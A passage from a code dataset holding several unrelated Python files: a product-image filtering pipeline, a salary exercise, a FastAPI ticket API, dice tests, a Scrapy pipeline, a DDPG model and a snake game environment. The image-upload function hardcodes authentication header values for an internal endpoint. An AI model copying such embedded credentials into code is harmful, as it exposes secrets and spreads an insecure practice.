aveBg,cannyorg,gray\r\n\r\n#判断目标是否触边不完整(默认白色背景下)\r\ndef iscomplete(gray):\r\n bcomplete = True\r\n if np.where(gray[1]>253,0,1).sum()*10>gray.shape[1] or np.where(gray[0]>253,0,1).sum()*10>gray.shape[1]:\r\n bcomplete = False\r\n if np.where(gray[gray.shape[0]-2]>253,0,1).sum()*10>gray.shape[1] or np.where(gray[gray.shape[0]-1]>253,0,1).sum()*10>gray.shape[1]:\r\n bcomplete = False\r\n if np.where(gray[:,1]>253,0,1).sum()*10>gray.shape[0] or np.where(gray[:,0]>253,0,1).sum()*10>gray.shape[0]:\r\n bcomplete = False\r\n if np.where(gray[:,gray.shape[1]-2]>253,0,1).sum()*10>gray.shape[0] or np.where(gray[:,gray.shape[1]-1]>253,0,1).sum()*10>gray.shape[0]:\r\n bcomplete = False\r\n return bcomplete\r\n\r\n#修正图像,只对白底图片有效\r\ndef modify_pic(skupath, im_path):\r\n \"\"\"\r\n\r\n :param skupath:\r\n :param im_path:\r\n :return: modified_im_path\r\n \"\"\"\r\n modified_im_path = ''\r\n respath = os.path.join(skupath,'modified/')\r\n if os.path.exists(respath) == False:\r\n os.makedirs(respath)\r\n maxratio = 0.85\r\n pil_imag = Image.open(im_path)\r\n bestpic = cv2.cvtColor(np.asarray(pil_imag.convert('RGB')), cv2.COLOR_RGB2BGR)\r\n\r\n # bestpic = cv2.imread(im_path)\r\n # if bestpic.empty():\r\n # return im_path\r\n bg0, mask0, gray0 = get_mainitem_mask_rough(bestpic)\r\n\r\n #白色背景并且主体完整才会进行修正\r\n if bg0 > 253: #and iscomplete(gray0):\r\n #补充前景区域\r\n mask_fg = np.where(gray0 > 253, mask0, 1).astype('uint8')\r\n image, fgcontours, hierarchy = cv2.findContours(mask_fg, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\r\n #如果商品主体在画面内不完整,则不修正\r\n if len(fgcontours) == 1 and iscomplete(gray0) == False:\r\n modified_im_path = im_path\r\n elif len(fgcontours) == 1:\r\n itemrect = cv2.boundingRect(fgcontours[0])\r\n\r\n # 判断商品位置及大小是否合理\r\n itemarea = itemrect[2] * itemrect[3]\r\n imarea = mask0.shape[0] * mask0.shape[1]\r\n ratio = itemarea / imarea\r\n\r\n # 修正主图,商品居中,最长边不能超过画面的90%\r\n if itemrect[2] > itemrect[3]:\r\n scale = bestpic.shape[1] * maxratio / itemrect[2]\r\n else:\r\n scale = bestpic.shape[0] * maxratio / itemrect[3]\r\n\r\n if scale >= 1 and ratio > 0.5 and ratio < 0.8:\r\n modified_im_path = im_path\r\n else:\r\n # 修正主图\r\n crop = bestpic[itemrect[1]:itemrect[1] + itemrect[3], itemrect[0]:itemrect[0] + itemrect[2]]\r\n dst = cv2.resize(crop, (int(crop.shape[1] * scale), int(crop.shape[0] * scale)))\r\n # cv2.imshow('11111',dst)\r\n # cv2.waitKey(0)\r\n bottom = int((bestpic.shape[0] - dst.shape[0]) / 2)\r\n right = int((bestpic.shape[1] - dst.shape[1]) / 2)\r\n top = (bestpic.shape[0] - dst.shape[0]) - bottom\r\n left = (bestpic.shape[1] - dst.shape[1]) - right\r\n dst = cv2.copyMakeBorder(dst, top, bottom, left, right, cv2.BORDER_CONSTANT,\r\n value=(bg0, bg0, bg0))\r\n newfile = respath + im_path[im_path.rfind('/') + 1:]\r\n cv2.imwrite(newfile, dst)\r\n modified_im_path = newfile\r\n elif len(fgcontours) > 1:\r\n rects = []\r\n pic_area = bestpic.shape[0] * bestpic.shape[1]\r\n for contour in fgcontours:\r\n boundingbox = cv2.boundingRect(contour)\r\n center_x = (boundingbox[0] + boundingbox[2]) / 2\r\n center_y = (boundingbox[1] + boundingbox[3]) / 2\r\n # 对于不足画面1/6并且在画面四周的区域当作背景处理\r\n if cv2.contourArea(contour, False) * 6 < pic_area and (\r\n center_x * 3 < bestpic.shape[1] or center_y * 3 < bestpic.shape[0] or center_x * 3 >\r\n bestpic.shape[1] * 2 or center_y * 3 < bestpic.shape[0] * 2):\r\n newcontour = contour.reshape(contour.shape[0], contour.shape[2])\r\n cv2.fillPoly(bestpic, [newcontour], (bg0, bg0, bg0)) # logo或者小物件,标记为背景\r\n else:\r\n rects.append(boundingbox)\r\n if len(rects) > 0:\r\n x1 = bestpic.shape[1]\r\n y1 = bestpic.shape[0]\r\n x2 = 0\r\n y2 = 0\r\n for rect in rects:\r\n if rect[0] < x1:\r\n x1 = rect[0]\r\n if rect[1] < y1:\r\n y1 = rect[1]\r\n if rect[0] + rect[2] > x2:\r\n x2 = rect[0] + rect[2]\r\n if rect[1] + rect[3] > y2:\r\n y2 = rect[1] + rect[3]\r\n itemrect = [x1, y1, x2 - x1, y2 - y1]\r\n\r\n # 判断商品位置及大小是否合理\r\n itemarea = itemrect[2] * itemrect[3]\r\n imarea = bestpic.shape[0] * bestpic.shape[1]\r\n\r\n # 修正主图,商品居中,最长边不能超过画面的90%\r\n if itemrect[2] > itemrect[3]:\r\n scale = bestpic.shape[1] * maxratio / itemrect[2]\r\n else:\r\n scale = bestpic.shape[0] * maxratio / itemrect[3]\r\n\r\n if iscomplete(gray0) == False:\r\n dst = bestpic\r\n else:\r\n # 修正主图\r\n crop = bestpic[itemrect[1]:itemrect[1] + itemrect[3], itemrect[0]:itemrect[0] + itemrect[2]]\r\n # print('scale ,bestpic.shape, crop.shape, itemrect',scale ,bestpic.shape, crop.shape, itemrect)\r\n # print(int(crop.shape[1] * scale), int(crop.shape[0] * scale))\r\n dst = cv2.resize(crop, (int(crop.shape[1] * scale), int(crop.shape[0] * scale)))\r\n # cv2.imshow('11111',dst)\r\n # cv2.waitKey(0)\r\n bottom = int((bestpic.shape[0] - dst.shape[0]) / 2)\r\n right = int((bestpic.shape[1] - dst.shape[1]) / 2)\r\n top = (bestpic.shape[0] - dst.shape[0]) - bottom\r\n left = (bestpic.shape[1] - dst.shape[1]) - right\r\n dst = cv2.copyMakeBorder(dst, top, bottom, left, right, cv2.BORDER_CONSTANT,\r\n value=(bg0, bg0, bg0))\r\n newfile = respath + im_path[im_path.rfind('/') + 1:]\r\n cv2.imwrite(newfile, dst)\r\n modified_im_path = newfile\r\n else:\r\n modified_im_path = im_path\r\n else:\r\n modified_im_path = im_path\r\n return modified_im_path\r\n\r\n#下载图像,默认20s超时\r\ndef download_image(image_url, file_path, timeout=20):\r\n\r\n response = None\r\n try_times = 0\r\n while True:\r\n try:\r\n try_times += 1\r\n response = requests.get(image_url, headers=headers, timeout=timeout)\r\n # print(file_path)\r\n with open(file_path, 'wb') as f:\r\n f.write(response.content)\r\n response.close()\r\n break\r\n\r\n except Exception as e:\r\n if try_times < 2:\r\n continue\r\n if response:\r\n response.close()\r\n print(\"## Fail: {} {}\".format(image_url, e.args))\r\n break\r\n\r\n\r\n# 下载图片到本地缓存\r\ndef downloadimgs(skupath, urllist):\r\n \"\"\"\r\n\r\n :param skupath:对应的缓存目录\r\n :param urllist:\r\n :return:{localpath1:url1,localpath2:url2,localpath3:url3...}\r\n \"\"\"\r\n #800x800\r\n # prefix = 'http://img14.360buyimg.com/n12/'\r\n prefix = 'http://img13.360buyimg.com/n12/'\r\n #350x350\r\n # prefix = 'http://img14.360buyimg.com/n1/'\r\n reslist = collections.OrderedDict()\r\n\r\n if os.path.exists(skupath) == False:\r\n os.makedirs(skupath)\r\n for urlinfo in urllist:\r\n file_name = urlinfo[urlinfo.rfind('/') + 1:]\r\n filepath = os.path.join(skupath, file_name)\r\n filepath = filepath.replace('\\\\', '/')\r\n if os.path.exists(filepath) == False:\r\n try:\r\n # print('downloading ', prefix+urlinfo)\r\n # request.urlretrieve((prefix+urlinfo), filepath)\r\n # print(file_name)\r\n download_image((prefix+urlinfo), filepath)\r\n reslist[filepath] = urlinfo\r\n\r\n except:\r\n print('download image failed!url:', urlinfo)\r\n else:\r\n reslist[filepath] = urlinfo\r\n\r\n return reslist\r\n\r\ndef uploadImage(localPath):\r\n print (\"local path: %s\" % localPath)\r\n url='http://upload.erp.360buyimg.local/imageUpload.action'\r\n headers={'aucode': 'f2424b3a07a5604f0209416035a4923a', 'type':'0', 'keycode':'860f79451387081_'}\r\n f=open(localPath,'rb')\r\n data=f.read()\r\n r = requests.post(url, data=data, headers=headers)\r\n return r.json()[0]['msg']\r\n\r\n\r\ndef evaluate_pic(skupath, im_path, model, use_gpu):\r\n res_path = ''\r\n pic_type = -1\r\n bg_color = 'unknown'\r\n try:\r\n img = Image.open(im_path)\r\n image = img.convert('RGB')\r\n image = data_transform(image)\r\n except Exception as e:\r\n print(im_path)\r\n print(e)\r\n return bg_color, pic_type, res_path\r\n #如果宽高异常,直接退出\r\n width, height = img.size\r\n if abs(width-height) > 20:\r\n return bg_color, pic_type, res_path\r\n \r\n image = Variable(image.unsqueeze(0), volatile=True)\r\n if use_gpu:\r\n image = image.cuda()\r\n\r\n #主体分,背景白色概率,有logo概率,有文字概率,有二维码概率\r\n res1,res2,res3,res4,res5 = model(image)\r\n score1 = functional.softmax(res1, dim=1).data[0][1]\r\n score2 = functional.softmax(res2, dim=1).data[0][0]\r\n score3 = functional.softmax(res3, dim=1).data[0][1]\r\n score4 = functional.softmax(res4, dim=1).data[0][1]\r\n score5 = functional.softmax(res5, dim=1).data[0][1]\r\n score1_0 = score1\r\n if score2 > 0.6:\r\n bg_color = 'white'\r\n elif score2 < 0.4:\r\n bg_color = 'color'\r\n\r\n #如果背景为白色,会进行图像修正\r\n if score2 > 0.8:\r\n #如果主体不好,但没有logo、文字和牛皮癣,可直接作为子图,无需修正\r\n if score1_0 < 0.6 and score3 < 0.3 and score4 < 0.2 and score5 < 0.2:\r\n modified_path = im_path\r\n else:\r\n try:\r\n modified_path = modify_pic(skupath, im_path)\r\n except Exception as e:\r\n print('modify image failed!', im_path)\r\n # print(e)\r\n logging.exception(e)\r\n modified_path = im_path\r\n\r\n if len(modified_path) > 0 and modified_path != im_path:\r\n try:\r\n img2 = Image.open(modified_path)\r\n image2 = img2.convert('RGB')\r\n image2 = data_transform(image2)\r\n image2 = Variable(image2.unsqueeze(0), volatile=True)\r\n if use_gpu:\r\n image2 = image2.cuda()\r\n # 主体分,背景白色概率,有logo概率,有文字概率,有二维码概率\r\n res1, res2, res3, res4, res5 = model(image2)\r\n score1 = functional.softmax(res1, dim=1).data[0][1]\r\n score3 = functional.softmax(res3, dim=1).data[0][1]\r\n score4 = functional.softmax(res4, dim=1).data[0][1]\r\n score5 = functional.softmax(res5, dim=1).data[0][1]\r\n except Exception as e:\r\n print(modified_path)\r\n print(e)\r\n if score1_0 > 0.8 and score1 > 0.8 and score3 < 0.2 and score4 < 0.1 and score5 < 0.2:\r\n pic_type = 2 #满足主图\r\n res_path = modified_path\r\n elif score4 < 0.1 and score5 < 0.2:\r\n pic_type = 1 #不满足主图但满足子图需求\r\n res_path = modified_path\r\n else:\r\n res_path = modified_path\r\n else:\r\n if score1_0 > 0.8 and score3 < 0.2 and score4 < 0.1 and score5 < 0.2:\r\n pic_type = 2 #满足主图\r\n res_path = im_path\r\n elif score4 < 0.1 and score5 < 0.2:\r\n pic_type = 1 #不满足主图但满足子图需求\r\n res_path = im_path\r\n else:\r\n res_path = im_path\r\n\r\n #对于模型预测为白底的图像,检查两边两列是否完全为白色\r\n if bg_color == 'white' and len(res_path) > 0:\r\n try:\r\n gray = np.array(Image.open(res_path).convert('L')).astype('uint8')\r\n\r\n # 计算左右两列是否全为白色\r\n if np.where(gray[:, 1] == 255, 0, 1).sum() * 100 > gray.shape[0] or np.where(gray[:, 0] == 255, 0,\r\n 1).sum() * 100 > gray.shape[\r\n 0] or np.where(gray[:, gray.shape[1] - 2] == 255, 0, 1).sum() * 100 > gray.shape[0] or np.where(\r\n gray[:, gray.shape[1] - 1] == 255, 0, 1).sum() * 100 > gray.shape[0]:\r\n bg_color = 'unknown'\r\n except Exception as e:\r\n print(e)\r\n bg_color = 'unknown'\r\n\r\n return bg_color, pic_type, res_path\r\n\r\n\r\n#对外接口\r\n#callable class\r\nclass GetValidPics(object):\r\n \"\"\"筛选修正图片\r\n\r\n Args:\r\n model_path:打分模型路径\r\n \"\"\"\r\n\r\n def __init__(self, model_path='./param_best.pth', similarity_model='./squeezenet1_1-f364aa15.pth', use_gpu=False, device_id=0):\r\n print('prepare model!')\r\n # 加载到cpu\r\n self.model = multi_task_resnet.MultiTaskResnet()\r\n self.use_gpu = False\r\n self.device_id = device_id\r\n if use_gpu and torch.cuda.is_available():\r\n self.use_gpu = True\r\n if self.use_gpu:\r\n self.model.load_state_dict(torch.load(model_path))\r\n self.model = self.model.cuda()\r\n else:\r\n self.model.load_state_dict(torch.load(model_path, map_location=lambda storage, loc: storage))\r\n self.model = self.model.eval()\r\n print('load model finished!')\r\n self.compute_similarity = pic_similarity.ComputeSimilarity(model_path=similarity_model, usegpu=use_gpu)\r\n\r\n\r\n def __call__(self, skuid, url_list):\r\n \"\"\"\r\n Args:\r\n url_list: [str1,str2,str3,...] ,str(url:is_primary)\r\n\r\n Returns:\r\n a list,[url1,url2,url3] or []\r\n \"\"\"\r\n print('processing skuid:', skuid)\r\n\r\n # 本地缓存\r\n tmppath = '/data1/tmp/'\r\n if os.path.exists(tmppath) == False:\r\n os.makedirs(tmppath)\r\n reslist = []\r\n main_image_bg = 'unknown'\r\n\r\n # 获得URL,只取最新的图片\r\n srclist = []\r\n for info in url_list:\r\n urlinfo = info.split(':')\r\n if urlinfo[1] == '1' and len(srclist) > 1:\r\n break\r\n srclist.append(urlinfo[0])\r\n t1 = cv2.getTickCount()\r\n # 下载图片到本地缓存\r\n skupath = os.path.join(tmppath, skuid)\r\n if os.path.exists(skupath) == False:\r\n os.makedirs(skupath)\r\n pic_dict = downloadimgs(skupath, srclist)\r\n t2 = cv2.getTickCount()\r\n print('download time:%.2f s' % ((t2 - t1) / cv2.getTickFrequency()))\r\n\r\n t1 = cv2.getTickCount()\r\n # 返回图片路径 list,list长度为0-3,分别是[主图,子图1,子图2](如果有)\r\n # 路径为原始url,主图如果修改过,则路径为新上传的路径\r\n main_pic_list = []\r\n sub_pic_list = []\r\n main_pic_bg = []\r\n\r\n #处理所有图片\r\n for pic in pic_dict.keys():\r\n #意味着得到5张有效图片后就会直接退出\r\n if len(main_pic_list) > 0 and len(main_pic_list)+len(sub_pic_list) > 4:\r\n break\r\n #判断图片是否合适,并修正图片\r\n bg_color, pic_type, res_path = evaluate_pic(skupath, pic, self.model, self.use_gpu)\r\n if pic_type == 2:\r\n main_pic_list.append(res_path)\r\n main_pic_bg.append(bg_color)\r\n elif pic_type == 1:\r\n sub_pic_list.append(res_path)\r\n md5_str = ''\r\n #至少有一张图片适合做主图时才会比较子图\r\n if len(main_pic_list) > 0:\r\n valid_pics = []\r\n # 确定主图\r\n main_image_bg = main_pic_bg[0]\r\n valid_pics.append(main_pic_list[0])\r\n total_pics = main_pic_list + sub_pic_list\r\n total_num = len(total_pics)\r\n\r\n #去除重复图片\r\n for i in range(1, total_num):\r\n if len(valid_pics) >= 3:\r\n break\r\n have_similar_pic = False\r\n for valid_pic in valid_pics:\r\n if self.compute_similarity(valid_pic, total_pics[i]):\r\n have_similar_pic = True\r\n break\r\n if have_similar_pic==False:\r\n valid_pics.append(total_pics[i])\r\n\r\n for i in range(min(3, len(valid_pics))):\r\n # if valid_pics[i] in pic_dict.keys():\r\n # url = pic_dict[valid_pics[i]]\r\n # else:\r\n # url = uploadImage(valid_pics[i])\r\n # reslist.append(url)\r\n #本地测试,输出结果为本地路径\r\n reslist.append(valid_pics[i])\r\n md5, _ = File_md5(valid_pics[i])\r\n md5_str = md5_str + str(md5)\r\n # 删除缓存\r\n # if os.path.exists(skupath) == True:\r\n # shutil.rmtree(skupath)\r\n res_md5 = hashlib.md5(md5_str.encode('utf-8')).hexdigest()\r\n t2 = cv2.getTickCount()\r\n print('process time:%.2f s' % ((t2 - t1) / cv2.getTickFrequency()))\r\n return main_image_bg, reslist, res_md5\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"pic_evaluator/sku_pic_filter/pic_filter_v2.py","file_name":"pic_filter_v2.py","file_ext":"py","file_size_in_byte":22108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"70473941","text":"#037 - Salário Mensal - Modo Completo\n\nsBruto = int(input('Salário Bruto: '))\nIR = (11/100)*sBruto\nINSS = (8/100)*sBruto\nSind = (5/100)*sBruto\nsLiq = sBruto - IR - INSS - Sind\n\nhoras = 8\nsalarioDia = sBruto/30\nsalarioHora = salarioDia/horas\nhMensal = horas*30\n\nprint(f'Salário Bruto: R${sBruto:.2f} ---> Salário Líquido: R${sLiq:.2f}')\nprint(f'Horas Mensais: {hMensal}')\nprint(f'Salário-Dia (Calculado usando o Salário Bruto como referência: R${salarioDia:.2f}')\nprint(f'Salário-Hora(Salário Bruto como Referência): R${salarioHora:.2f}')\n","sub_path":"Exercícios Gerais/037 - Salário Mensal.py","file_name":"037 - Salário Mensal.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"323094892","text":"import time\nfrom typing import List\n\nfrom fastapi import APIRouter, Depends, HTTPException, Body\nfrom pydantic import parse_obj_as, BaseModel, Field\n\nfrom ..db import tickets, services\nfrom ..lib import with_auth\nfrom ..typings.service import ServiceModel\nfrom ..typings.ticket import TicketModel\nfrom ..typings.token import TokenModel\n\nrouter = APIRouter()\n\n\n@router.get(\"/\", response_model=List[TicketModel], response_model_exclude={\"_id\"}, name=\"My Tickets\")\ndef mine(token: TokenModel = Depends(with_auth)):\n try:\n data = parse_obj_as(List[TicketModel], [*tickets.find({\"owner\": token.id})])\n except ValueError:\n raise HTTPException(status_code=404, detail=\"user.notfound\")\n\n return data\n\n\nclass PurchaseRequestModel(BaseModel):\n service: str = Field(\n description=\"Внутренний ID сервиса/аттракциона\",\n max_length=16,\n min_length=16,\n )\n\n count: int = Field(\n description=\"Количество билетов\",\n gt=0\n )\n\n isForChild: bool = Field(\n description=\"Является ли билет детским\"\n )\n\n\n@router.post(\"/\", response_model_exclude={\"_id\"}, name=\"Purchase Ticket\", status_code=201)\ndef purchase(token: TokenModel = Depends(with_auth), data: PurchaseRequestModel = Body(..., embed=False)):\n try:\n serv: ServiceModel = parse_obj_as(ServiceModel, services.find_one({\"sid\": data.service}))\n except ValueError as err:\n print(err)\n raise HTTPException(status_code=404, detail=\"service.notfound\")\n\n ticket = TicketModel(service=data.service, uses=data.count, owner=token.id, isForChild=data.isForChild,\n createdAt=time.time(), expiresAt=time.time() + serv.expireTime)\n\n tickets.insert_one(ticket.dict())\n\n return ticket\n","sub_path":"src/apis/tickets.py","file_name":"tickets.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"484516533","text":"from functools import partial\n\nfrom dragn.dice import D4, D6, D8, D10, D12, D20, roller\nfrom dragn.dice.die_and_roller import roller\n\n\nclass TestRoller:\n def test_roller_very_naive(self):\n fake_randomness = lambda max_value, randomness: 4\n\n result = roller(0, randomness=fake_randomness)\n\n assert result == 4\n\n def test_default_roller(self):\n result = roller(6)\n\n assert result in range(1, 7)\n\n def test_custom_roller_with_partial(self):\n die = partial(roller, 6)\n\n assert die() in range(1, 7)\n\n\nclass TestDie:\n def test_one_configured_die(self):\n assert D4() in range(1, 5)\n\n def test_all_configured_dice(self):\n configured_dice = {\n D4: range(1, 5),\n D6: range(1, 7),\n D8: range(1, 9),\n D10: range(1, 11),\n D12: range(1, 13),\n D20: range(1, 21),\n }\n for die, results_range in configured_dice.items():\n assert die() in results_range\n","sub_path":"dragn/tests/test_dice.py","file_name":"test_dice.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"86967390","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport pymongo\n\nclass WanyiyunPipeline(object):\n def __init__(self):\n client = pymongo.MongoClient('localhost',27017)\n wanyi = client['wanyiyun']\n songs = wanyi['hotcomment']\n self.post = songs\n\n def process_item(self, item, spider):\n info = dict(item)\n self.post.insert(info)\n return item\n","sub_path":"pilelines.py","file_name":"pilelines.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"587287310","text":"import torch.nn as nn\nfrom utilities.util import *\nfrom models.model import Model\nfrom learning_algorithms.ddpg import DDPG\nfrom critics.mlp_critic import MLPCritic\n\n\n\nclass IDDPG(Model):\n def __init__(self, args, target_net=None):\n super(IDDPG, self).__init__(args)\n self.construct_model()\n self.apply(self.init_weights)\n if target_net != None:\n self.target_net = target_net\n self.reload_params_to_target()\n self.rl = DDPG(self.args)\n\n def construct_value_net(self):\n if self.args.agent_id:\n input_shape = self.obs_dim + self.act_dim + self.n_\n else:\n input_shape = self.obs_dim + self.act_dim\n output_shape = 1\n if self.args.shared_params:\n self.value_dicts = nn.ModuleList( [ MLPCritic(input_shape, output_shape, self.args) ] )\n else:\n self.value_dicts = nn.ModuleList( [ MLPCritic(input_shape, output_shape, self.args) for _ in range(self.n_) ] )\n\n def construct_model(self):\n self.construct_value_net()\n self.construct_policy_net()\n\n def value(self, obs, act):\n # obs_shape = (b, n, o)\n # act_shape = (b, n, a)\n batch_size = obs.size(0)\n\n # add agent id\n if self.args.agent_id:\n agent_ids = th.eye(self.n_).unsqueeze(0).repeat(batch_size, 1, 1).to(self.device) # shape = (b, n, n)\n obs = th.cat( (obs, agent_ids), dim=-1 ) # shape = (b, n, o+n)\n\n if self.args.shared_params:\n obs = obs.contiguous().view(batch_size*self.n_, -1) # shape = (b*n, o+n/o)\n act = act.contiguous().view(batch_size*self.n_, -1) # shape = (b*n, a)\n agent_value = self.value_dicts[0]\n inputs = th.cat([obs, act], dim=-1)\n values, _ = agent_value(inputs, None)\n values = values.contiguous().view(batch_size, self.n_, -1)\n else:\n inputs = th.cat([obs, act], dim=-1) # shape = (b, n, o+a+n/o+a)\n values = []\n for i, agent_value in enumerate(self.value_dicts):\n value, _ = agent_value(inputs[:, i, :], None)\n values.append(value)\n values = th.stack(values, dim=1)\n\n return values\n\n def get_actions(self, state, status, exploration, actions_avail, target=False, last_hid=None):\n target_policy = self.target_net.policy if self.args.target else self.policy\n if self.args.continuous:\n means, log_stds, hiddens = self.policy(state, last_hid=last_hid) if not target else target_policy(state, last_hid=last_hid)\n if means.size(-1) > 1:\n means_ = means.sum(dim=1, keepdim=True)\n log_stds_ = log_stds.sum(dim=1, keepdim=True)\n else:\n means_ = means\n log_stds_ = log_stds\n actions, log_prob_a = select_action(self.args, means_, status=status, exploration=exploration, info={'log_std': log_stds_})\n restore_mask = 1. - (actions_avail == 0).to(self.device).float()\n restore_actions = restore_mask * actions\n action_out = (means, log_stds)\n else:\n logits, _, hiddens = self.policy(state, last_hid=last_hid) if not target else target_policy(state, last_hid=last_hid)\n logits[actions_avail == 0] = -9999999\n actions, log_prob_a = select_action(self.args, logits, status=status, exploration=exploration)\n restore_actions = actions\n action_out = logits\n return actions, restore_actions, log_prob_a, action_out, hiddens\n\n def get_loss(self, batch):\n policy_loss, value_loss, action_out = self.rl.get_loss(batch, self, self.target_net)\n return policy_loss, value_loss, action_out\n","sub_path":"models/iddpg.py","file_name":"iddpg.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"399254677","text":"import random\nfrom utils import *\nfrom tensorflow import keras\nfrom skimage import transform\n#########\n# COLORS\n#########\n\nGREEN = (0, 255, 0)\nHEAD_YELLOW = (255, 255, 0)\nBODY_YELLOW = (255, 255, 102)\nWALL = (255, 0, 0)\nBLACK = (0, 0, 0)\n\nGREEN_ID = 3\nHEAD_YELLOW_ID = 1\nBODY_YELLOW_ID = 2\nWALL_ID = 4\nBLACK_ID = 0\n\n#############################\n\n\nclass SnakeEnvironment:\n\tdef __init__(self, width, length, snake_size, wall_size):\n\t\tself.actions_space = 4\n\t\tassert width%snake_size == 0 and length%snake_size == 0, \"width and length must be a multiple of snake_size\"\n\t\tself.wall_size = wall_size\n\t\tself.width = width - 2*wall_size\n\t\tself.length = length - 2*wall_size\n\t\tself.states_space = np.zeros((width, length), dtype=np.uint8)\n\n\t\tself.states_space[:, 0:self.wall_size] = 4\n\t\tself.states_space[:, -self.wall_size:] = 4\n\t\tself.states_space[-self.wall_size:, :] = 4\n\t\tself.states_space[0:self.wall_size, :] = 4\n\n\t\tself.snake_size = snake_size\n\t\tself.score = 0\n\n\t\tself.possible_x = [i for i in range(wall_size, self.width, snake_size)]\n\t\tself.possible_y = [i for i in range(wall_size, self.length, snake_size)]\n\n\t\tself.head_x = random.choice(self.possible_x)\n\t\tself.head_y = random.choice(self.possible_y)\n\t\tself.snake_head = [self.head_x, self.head_y]\n\t\tself.snake_list = [self.snake_head]\n\t\tself.foodx, self.foody = add_food(self.possible_x, self.possible_y, self.snake_list)\n\n\t\tself.firstcall = True\n\t\tself.env_clock = None\n\t\tself.screen = None\n\t\tself.score_font = None\n\n\tdef reset(self):\n\t\tself.head_x = random.choice(self.possible_x)\n\t\tself.head_y = random.choice(self.possible_y)\n\t\tself.snake_head = [self.head_x, self.head_y]\n\t\tself.snake_list = [self.snake_head]\n\n\t\tsecond_x = 2*self.wall_size if self.head_x == self.wall_size else self.head_x - self.wall_size\n\t\tsecond_y = self.head_y\n\t\tchunck = [second_x, second_y]\n\t\tself.snake_list.insert(0, chunck)\n\n\t\tself.foodx, self.foody = add_food(self.possible_x, self.possible_y, self.snake_list)\n\n\t\tself.board_status = np.copy(self.states_space)\n\n\t\tfor i in range(self.snake_size):\n\t\t\tfor j in range(self.snake_size):\n\t\t\t\tself.board_status[self.foody+i][self.foodx+j] = GREEN_ID\n\t\t\t\tself.board_status[self.snake_head[1]+i][self.snake_head[0]+j] = HEAD_YELLOW_ID\n\t\t\t\tfor b in self.snake_list[:-1]:\n\t\t\t\t\tself.board_status[b[1]+i][b[0]+j] = BODY_YELLOW_ID\n\n\t\tself.score = 0\n\n\t\t# self.board_status = scale_lumininance(self.board_status)/255.0\n\t\t# self.board_status = transform.resize(self.board_status, (84, 84))\n\t\treturn self.board_status\n\n\tdef observation(self):\n\t\tself.board_status = np.copy(self.states_space)\n\t\tfor i in range(self.snake_size):\n\t\t\tfor j in range(self.snake_size):\n\t\t\t\tself.board_status[self.foody+i][self.foodx+j] = GREEN_ID\n\t\t\t\tself.board_status[self.snake_head[1]+i][self.snake_head[0]+j] = HEAD_YELLOW_ID\n\n\t\t# self.board_status = scale_lumininance(self.board_status)/255.0\n\n\t\treturn self.board_status\n\n\tdef get_state_map(self):\n\t\tself.board_status = np.copy(self.states_space)\n\n\t\tfor i in range(self.snake_size):\n\t\t\tfor j in range(self.snake_size):\n\t\t\t\tself.board_status[self.foody + i][self.foodx + j] = GREEN_ID\n\t\t\t\tfor b in self.snake_list[:-1]:\n\t\t\t\t\tself.board_status[b[1]+i][b[0]+j] = BODY_YELLOW_ID\n\n\t\tif 0 <= self.snake_head[0] < self.width+2*self.wall_size and 0 <= self.snake_head[1] < self.length+2*self.wall_size:\n\t\t\tfor i in range(self.snake_size):\n\t\t\t\tfor j in range(self.snake_size):\n\t\t\t\t\tself.board_status[self.snake_head[1] + i][self.snake_head[0] + j] = HEAD_YELLOW_ID\n\n\t\t# self.board_status = scale_lumininance(self.board_status)/255.0\n\t\t# self.board_status = transform.resize(self.board_status, (84, 84))\n\t\treturn self.board_status\n\n\tdef step(self, action):\n\t\tterminal = False\n\t\tadd_block = False\n\t\tif action == 3:\n\t\t\tx_change = -self.snake_size\n\t\t\ty_change = 0\n\t\telif action == 1:\n\t\t\tx_change = self.snake_size\n\t\t\ty_change = 0\n\t\telif action == 0:\n\t\t\ty_change = -self.snake_size\n\t\t\tx_change = 0\n\t\telif action == 2:\n\t\t\ty_change = self.snake_size\n\t\t\tx_change = 0\n\n\t\tself.head_x += x_change\n\t\tself.head_y += y_change\n\t\tself.snake_head = [self.head_x, self.head_y]\n\t\tself.snake_list.append(self.snake_head)\n\n\t\tif self.head_x >= self.width+self.wall_size or self.head_x < self.wall_size or self.head_y >= self.length + self.wall_size or self.head_y < self.wall_size:\n\t\t\tterminal = True\n\t\t\treward = -1.0\n\n\t\tfor x in self.snake_list[:-1]:\n\t\t\tif x == self.snake_head:\n\t\t\t\tterminal = True\n\t\t\t\treward = -1.0\n\n\t\tif not terminal:\n\t\t\tif self.head_x == self.foodx and self.head_y == self.foody:\n\t\t\t\tself.foodx, self.foody = add_food(self.possible_x, self.possible_y, self.snake_list)\n\t\t\t\tadd_block = True\n\t\t\t\tself.score += 1\n\t\t\t\treward = 10.0#*(self.score)\n\t\t\telse:\n\t\t\t\treward = 0\n\n\t\tif not add_block:\n\t\t\tdel self.snake_list[0]\n\n\t\tnew_state = self.get_state_map()\n\n\t\treturn new_state, reward, terminal\n\n\tdef render(self):\n\t\tif self.firstcall:\n\t\t\tself.firstcall = False\n\t\t\tpygame.init()\n\t\t\tself.env_clock = pygame.time.Clock()\n\t\t\tself.screen = pygame.display.set_mode((self.width+2*self.wall_size, self.length+2*self.wall_size))\n\t\t\tself.score_font = pygame.font.SysFont(\"comicsansms\", 15)\n\t\t\tpygame.display.set_caption('Snake game test')\n\n\t\tself.display_screen()\n\n\n\tdef display_screen(self):\n\t\tself.screen.fill(WALL)\n\t\tpygame.draw.rect(self.screen, BLACK, 